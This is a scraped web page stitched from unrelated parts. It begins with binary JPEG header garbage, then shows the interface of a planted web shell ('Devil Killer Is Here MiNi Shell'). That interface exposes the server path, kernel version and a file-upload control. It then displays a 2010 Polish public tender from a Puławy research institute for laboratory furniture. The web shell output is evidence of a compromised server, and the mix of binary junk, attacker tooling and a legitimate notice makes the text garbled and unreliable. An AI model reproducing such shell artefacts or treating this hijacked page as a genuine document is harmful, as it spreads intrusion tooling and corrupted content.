JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101129/387560-N-2010.html

<p class="kh_header"><b>Puławy: Meble laboratoryjne</b><br>
<b>Numer ogłoszenia: 387560 - 2010; data zamieszczenia: 29.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Nawozów Sztucznych , Aleja Tysiąclecia Państwa Polskiego 13A, 24-110 Puławy, woj. lubelskie, tel. 81 473 14 00, faks 81 473 14 10.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ins.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Meble laboratoryjne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> MEBLE LABORATORYJNE

Stanowisko wyspowe  I	- 1 szt.

Wymagane parametry techniczne

Wymiary wyspy: długość 3150 mm + - 5%; głębokość 1500 mm + - 5%; wysokość 900 mm (1800 mm z nadstawką),
Stelaż typu A, z rur stalowych lakierowanych proszkowo - 5 modułowy,
Blat z granitu naturalnego, w stole zamykającym dwustronnie ścięty,
Zlew z ceramiki technicznej 460x460 (+ - 5%),
Bateria laboratoryjna c, z woda, z mieszaczem,
Zawór wody demineralizowanej- szt.1,
Zlewik ceramiczny 295x145 mm (+ - 5%) - szt.2
Zawór zimnej wody - szt.2
Nadstawka laboratoryjna: konstrukcja modułowa, moduł o długości 1200 mm, z dwoma pólkami z regulacją wysokości na kolumnach wsporczych o przekroju trójkątnym, z 2 gniazdami sieciowymi w panelu czołowym kolumny - szt.4
Szafka zlewozmywakowa trzy komorowa, dwustronnie ścięta szer.1380mm + -5% szt.1
Szafka o szerokości 540 mm, dwudrzwiowa, z półką - szt.2
Szafka o szerokości 540 mm, dwudrzwiowa, z 1 szufladą, z półką - szt.4
Szafka o szerokości 540 mm z czterema szufladami - szt.2
Ociekacz pionowy typu jeż - szt.1
Oczomyjka - szt.1

Stanowisko wyspowe II	- 1 szt.

Wymagane parametry techniczne

Wymiary wyspy: długość 3150 mm + - 5%; głębokość 1500 mm + - 5%; wysokość 900 mm (1800 mm z nadstawką),
Stelaż typu A, z rur stalowych lakierowanych proszkowo - 5 modułowy,
Blat z granitu naturalnego, w stole zamykającym dwustronnie ścięty,
Zlew z ceramiki technicznej 460x460 mm (+ - 5%),
Bateria laboratoryjna c, z woda, z mieszaczem,
Zawór wody demineralizowanej- szt.1,
Zlewik ceramiczny 295x145 mm (+ - 5%) - szt.2
Zawór zimnej wody - szt.2
Nadstawka laboratoryjna: konstrukcja modułowa, moduł o długości 1200 mm, z dwoma pólkami z regulacją wysokości na kolumnach wsporczych o przekroju trójkątnym, z 2 gniazdami sieciowymi w panelu czołowym kolumny - szt.4
Szafka zlewozmywakowa trzy komorowa, dwustronnie ścięta szer.1380mm + -5% szt.1
Szafka o szerokości 540 mm, dwudrzwiowa, z półką - szt.2
Szafka o szerokości 540 mm, dwudrzwiowa, z 1 szufladą, z półką - szt.4
Szafka o szerokości 540 mm z czterema szufladami - szt.2
Ociekacz pionowy typu jeż - szt.1

Stół wagowy	-1 szt.
Wymagane parametry techniczne

Wymiary stołu: długość 900 mm + - 5%; głębokość 750 mm + - 5%; wysokość 750 mm,
Stelaż wzmocniony typu A, z rur stalowych lakierowanych proszkowo,
Blat z granitu naturalnego, z wkładką granitową pod wagę na wibroizolatorach,


Stanowisko laboratoryjne przyścienne	- 2 szt.
Wymagane parametry techniczne

Wymiary stanowiska: długość 1700 mm + - 5%; głębokość 750 mm + - 5%; wysokość 900 mm (1800 mm z nadstawką),
Stelaż typu A, z rur stalowych lakierowanych proszkowo,
Blat z płyty laminowanej,
Zlewik PP 150x150 mm,
Szafka o szerokości 525 mm, dwudrzwiowa, z 1 szufladą, z półką - szt.3
Nadstawka laboratoryjna: konstrukcja modułowa, moduł o długości 1700 mm, z dwoma pólkami z regulacją wysokości na kolumnach wsporczych o przekroju trójkątnym, z 2 gniazdami sieciowymi 230V 16A i 1 gniazdem trójfazowym 3x400, 230V w panelu czołowym kolumny

Stanowisko laboratoryjne przyścienne pod aparaturę	- 2 szt.
Wymagane parametry techniczne

Wymiary stanowiska: długość 1000 mm + - 5%; głębokość 750 mm + - 5%; wysokość 900 mm,
Stelaż typu A, z rur stalowych lakierowanych proszkowo,
Blat z płyty laminowanej,
Szafka o szerokości 880 mm, dwudrzwiowa, z półką - szt.1

Stanowisko laboratoryjne pod aparaturę	 - 2 szt.
Wymagane parametry techniczne

Wymiary stanowiska: długość 700 mm + - 5%; głębokość 750 mm + - 5%; wysokość 900 mm,
Stelaż typu A, z rur stalowych lakierowanych proszkowo,
Blat z płyty laminowanej,
Szafka o szerokości 580 mm, dwudrzwiowa, z 1 szufladą, z półką - szt.1

Stanowisko pod komputer - wykonanie łącznikowe	- 1 szt.
Wymagane parametry techniczne

Wymiary stanowiska: długość 1150 mm + - 5%; głębokość 750 mm + - 5%; wysokość 750 mm,
Rama wsporcza blatu z rury stalowej, łącznikowa,
Blat z płyty laminowanej z przelotką na przewody,
Półka pod klawiaturę, wysuwana spod blatu,
Półka pod komputer.




Taboret laboratoryjny PU wysoki	- 2 szt.
Wymagane parametry techniczne

Wysoki taboret obrotowy z regulacją wysokości. Siedzisko wykonane z pianki poliuretanowej. Stelaż ze stopkami. Podnóżek chromowany.

Krzesło laboratoryjne PU	- 1 szt.
Wymagane parametry techniczne

Taboret obrotowy z oparciem. Siedzisko i oparcie wykonane z pianki poliuretanowej. Stojak z kółkami. Krzesło z regulacją CPT: regulowana wysokość siedziska i oparcia, pochylanie oparcia z możliwością blokowania oraz blokada odległości oparcia od siedziska.


Inne wymagania dotyczące mebli

STELAŻE
Stelaże stanowisk laboratoryjnych muszą być wykonane wg konstrukcji typu A  w całości ze skręcanych ram płaskich, spawanych z atestowanych stalowych profili zamkniętych o przekroju min. 27 x 40 x 2 mm. Wyklucza się stelaże o konstrukcji typu C. Stelaże stanowisk laboratoryjnych muszą być w całości malowane farbami epoksydowymi w kolorze RAL. Rama stelaża musi zapewnić podparcie blatu na całym obwodzie. Nogi stelaża muszą być wyposażone w stopki umożliwiające poziomowanie w zakresie 20 mm. Prześwit pomiędzy podłogą a dolną szafka podwieszaną musi wynosić min 150 mm +- 20 mm . Stelaż do stołu zamykającego (ze zlewem) wyspy: dwustronnie ścięty.

BLATY LABORATORYJNE
Blaty granitowe: płyta robocza z naturalnego granitu o grubości 30 mm ,o jednorodnej teksturze, odporna na uderzenia, zarysowania i ścieranie o zwiększonej odporności chemicznej, z polerowaną powierzchnią ułatwiającą czyszczenie, konserwowanie i dezynfekcję.
Blaty z laminatem HPL: wykonane z płyty wiórowej gr.28mm oklejanej laminatem wysokociśnieniowym HPL o grubości min. 0,8 mm . Blaty z laminatem HPL muszą wykazywać się dużą odpornością na uderzenia, odpornością na temperaturę do 150oC, wytrzymałością na zginanie i rozrywanie, odpornością chemiczną na lekkie związki chemiczne, odpornością na promieniowanie UV, trwałością koloru oraz właściwościami elektrostatycznymi. Krawędzie brzegowe blatów z laminatem HPL muszą być oklejone maszynowo z czterech stron twardym obrzeżem PCV o gr.2 mm.

NADSTAWKI INSTALACYJNE
Wymagane jest aby nadstawki instalacyjne były montowane trwale do blatu roboczego stołu laboratoryjnego. Nadstawki instalacyjne muszą być zbudowane z dwóch kolumn stalowych o przekroju trójkątnym, z blachy o grubości min. 0,8 mm lakierowanej proszkowo farbą epoksydową. Nadstawki muszą posiadać 2 poziomy półek laminowanych brzegowanych PCV 2 mm. 
Górna półka o głębokości 250 mm, dolna półka o głębokości 170 mm. Kolumny nadstawek instalacyjnych muszą posiadać perforację umożliwiającą zmianę położenia półek co 50 mm Konstrukcja musi zapewnić zmianę położenia półki bez użycia jakichkolwiek narzędzi. Wysokość nadstawki instalacyjnej z 2 półkami -min. 900 mm. Nadstawki wyposażone w gniazda elektryczne 230V/16A, w obudowie bryzgoszczelnej IP44). Podłączenie gniazd musi być zgodne z normą PN-EN 61010-1 (instalacja trójprzewodowa z wydzielonym przewodem ochronnym PE).
Nie dopuszcza się instalowania zaworów wody, gazu w kolumnach nadstawek instalacyjnych.

SZAFKI LAMINOWANE PODBLATOWE, PODWIESZANE
Korpus szafek podwieszanych musi być klejony fabrycznie, wykonany z płyty meblowej trójwarstwowej o grubości nie mniejszej niż 18 mm laminowanej obustronnie. Wymagane jest aby tylna ścianka korpusu szafki podwieszanej miała grubość min 8 mm. Fronty drzwi i szuflad szafek podwieszanych muszą być wykonane z płyty meblowej trójwarstwowej o grubości nie mniejszej niż 18 mm laminowanej obustronnie. Wszystkie widoczne krawędzie płyty laminowanej korpusu i frontów w szafce muszą być oklejone maszynowo obrzeżem twardym z PCV o gr. 2 mm .
Półki w szafach wykonane z płyty meblowej trójwarstwowej o grubości nie mniejszej niż 18 mm laminowanej obustronnie i oklejone maszynowo obrzeżem twardym z PCV o gr. 2 mm z czterech stron.
Korpus i fronty szafek podwieszanych w kolorze uzgodnionym z Zamawiającym.
Okucia meblowe -zawiasy powinny być stalowe z powłoką galwanizowaną z funkcją samodomykania w końcowej fazie zamykania drzwi, nie gorsze niż firmy Hafele.
Zamki patentowe nie gorsze niż firmy Hafele.
Prowadnice rolkowe nie gorsze niż firmy Hafele.
Uchwyty metalowe chromowane z pręta O 10 o rozstawie 96 mm.
Szafka w stole zamykającym wyspę dwustronnie ścięta, z 3 komorami: komora środkowa typ zlewozmywakowy z drzwiczkami, komory boczne (ścięte) z drzwiczkami i półką.

ARMATURA LABORATORYJNA
Wymagane jest aby armatura laboratoryjna wody była usytuowana w blacie roboczym stanowiska laboratoryjnego.
Zawory i armatura powinna spełniać wymagania pracy w laboratorium a w szczególności ich powierzchnia powinna być odporna chemicznie i odporna na działanie promieni UV.
Wymagane jest aby armatura laboratoryjna była pokryta farbą na bazie żywic poliestrowych w kolorze jasny popiel.
Pokrętła zaworów muszą być oznakowane kodem barwnym zgodnie z normą PN-EN13792:2003.

ZLEWY I ZLEWIKI CERAMICZNE
Zlewy i zlewiki muszą być wykonane z ceramiki litej odporne na wszelkie kwasy (z wyjątkiem fluorowodoru), zasady, rozpuszczalniki i barwniki w stężeniach i temperaturach stosowanych w laboratorium chemicznym.




Wymagania techniczne oraz przepisy i standardy dot. mebli laboratoryjnych
(istotne wymagania i przepisy, które przedmiot zamówienia musi spełnić)
a)	Deklaracja zgodności z normami (kopia):
PN-EN 61140:2005 Ochrona przed porażeniem prądem elektrycznym - Wspólne aspekty instalacji i urządzeń,
PN-EN 61010:2004 Wymagania bezpieczeństwa dotyczące elektrycznych przyrządów pomiarowych, automatyki i urządzeń laboratoryjnych - część 1 Wymagania ogólne,
PN-EN 61293: 2000 Znakowanie urządzeń elektrycznych danymi znamionowymi   dotyczącymi zasilania elektrycznego - Wymagania bezpieczeństwa
PN-EN 60529:2003 Stopnie ochrony zapewnianej przez obudowy. (Kod IP)
PN-EN 60446:2004 Zasady podstawowe i bezpieczeństwa przy współdziałaniu człowieka z maszyną, oznaczanie i identyfikacja - Oznaczenia identyfikacyjne przewodów barwami albo cyframi
PN-EN 14056:2003 Meble laboratoryjne. Zalecenia dotyczące projektowania i instalowania.
PN-EN 13150:2004 Stoły robocze dla laboratoriów. Wymiary, wymagania bezpieczeństwa i metody badań
PN-IEC 60364-7-713:2005 Instalacje elektryczne w obiektach budowlanych. Wymagania dotyczące specjalnych instalacji lub lokalizacji. Meble.
PN-EN 13792:2003 Kod barwny do oznaczania zaworów w obsłudze laboratoriów.
b)	Atest higieniczności na meble laboratoryjne (kopia).
c)	Certyfikat ISO 9001:2008 w zakresie projektowania, produkcji, sprzedaży, montażu i serwisu mebli laboratoryjnych i dygestoriów (kopia).
d)	 Opinię o przydatności granitu na blaty laboratoryjne wydaną przez niezależną jednostkę badawczą (kopia).

w/w dokumenty powinny być dostarczone wraz z dostawą mebli laboratoryjnych.
 
INNE WYMAGANIA ZAMAWIAJĄCEGO
1)	Wymagany minimalny okres gwarancji na przedmiot zamówienia 36 miesięcy.
2)	Dostawa mebli do siedziby Zamawiającego (magazyn) oraz montaż mebli w miejscu (pokój nr 215, budynek laboratorium INS) i w terminie wskazanym przez Zamawiającego.
3) 	Dostarczone meble muszą być fabrycznie nowe, tzn. nie używane przed dniem dostawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.18.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceni czy Wykonawca spełnia warunek o którym mowa na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z art. 44 ustawy Pzp - druk do ewentualnego wykorzystania załącznik nr 3 do SIWZ. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia nie spełnia na podstawie dokumentów złożonych wraz z ofertą.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest przedłożyć wykaz wykonanych, a w przypadku świadczeń  okresowych lub ciągłych również wykonywanych, minimum 1 dostawa mebli laboratoryjnych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia  w okresie ostatnich trzech lat przed  upływem terminu składania ofert albo wniosków  o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości (min. 80 tys. PLN), przedmiotu, dat wykonania i odbiorców, oraz z załączeniem dokumentu potwierdzającego, że dostawy zostały wykonane lub są wykonywane należycie.   Zamawiający oceni, czy Wykonawca spełnia warunek o którym mowa na podstawie wykazu dostaw i dokumentów potwierdzających ich należyte wykonanie (np. referencje, opinie) - druk do ewentualnego wykorzystania załącznik nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceni czy Wykonawca spełnia warunek o którym mowa na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z art. 44 ustawy Pzp - druk do ewentualnego wykorzystania załącznik nr 3 do SIWZ. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia nie spełnia na podstawie dokumentów złożonych wraz z ofertą.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceni czy Wykonawca spełnia warunek o którym mowa na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z art. 44 ustawy Pzp - druk do ewentualnego wykorzystania załącznik nr 3 do SIWZ. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia nie spełnia na podstawie dokumentów złożonych wraz z ofertą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceni czy Wykonawca spełnia warunek o którym mowa na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z art. 44 ustawy Pzp - druk do ewentualnego wykorzystania załącznik nr 3 do SIWZ. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia nie spełnia na podstawie dokumentów złożonych wraz z ofertą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>2.	Zasady udziału w postępowaniu Wykonawców występujących wspólnie
2.1.	Oferta wspólna
W przypadku, kiedy ofertę składa kilka podmiotów, oferta musi spełniać następujące warunki: Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Zamawiający będzie żądać od Wykonawcy, którego oferta została wybrana jako najkorzystniejszą w przedmiotowym postępowaniu kopi umowy lub innego dokumentu potwierdzającego zawarcie umowy 
Przez Wykonawców składających ofertę wspólnie lub konsorcjum/spółki cywilnej, podpisane przez wszystkich partnerów, przy czym termin, na jaki została zawarta umowa konsorcjum, nie może być krótszy niż termin realizacji zamówienia.
Oferta winna być podpisana przez każdego partnera lub upoważnionego przedstawiciela/ pełnomocnika (partnera wiodącego).
Upoważnienie do pełnienia funkcji przedstawiciela/pełnomocnika (partnera wiodącego) wymaga podpisu prawnie upoważnionych przedstawicieli każdego z partnerów - należy je  załączyć je do oferty.
Pełnomocnik/przedstawiciel (wiodący partner) winien być upoważniony do zaciągania zobowiązań i płatności w imieniu każdego na rzecz każdego z partnerów oraz do wyłącznego występowania w realizacji kontraktu - do oferty należy załączyć oświadczenie.
Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań.
Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika  o reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2.2.		Wykonawcy występujący wspólnie, o których mowa w pkt. 2 składają jedną ofertę, przy czym:

Wykonawcy, o których mowa w pkt. 2 składają jedną ofertę, przy czym:

a)	oświadczenia lub dokumenty wskazane w rozdziale VIII SIWZ ust. 1 pkt. 1.1.; 1.2.; 1.3. i 1.4. - składa przynajmniej jeden Wykonawca, który jest zdolny do udokumentowania, że spełnia warunki lub każdy z Wykonawców składających ofertę wspólnie;

b)	wymagane oświadczenia lub dokumenty wskazane w rozdziale IX SIWZ ust. 1 pkt. 1, 2, 4 
- składa osobno każdy z Wykonawców.


	Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonywana w oparciu o  kompletność i prawidłowość złożonych wszystkich oświadczeń i dokumentów żądanych przez Zamawiającego, zgodnie z art. 22 ust. 1, z zastrzeżeniem art. 26 ust. 3. Pzp.

Ocena spełnienia warunków odbywać się będzie na zasadzie spełnianie spełnia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności. 
Zgodnie z art. 144 ustawy Pzp Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty gdy wystąpi którekolwiek z poniższych zdarzeń. 
1.	Nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mających wpływ na realizację zamówienia; 
2.	Zaistnieją zdarzenia o charakterze siły wyższej niezależnie od stron umowy, które uniemożliwiłyby terminowe wykonanie zamówienia. Strony zobowiązują się do ustalenia odpowiednio zmienionego terminu umowy. 
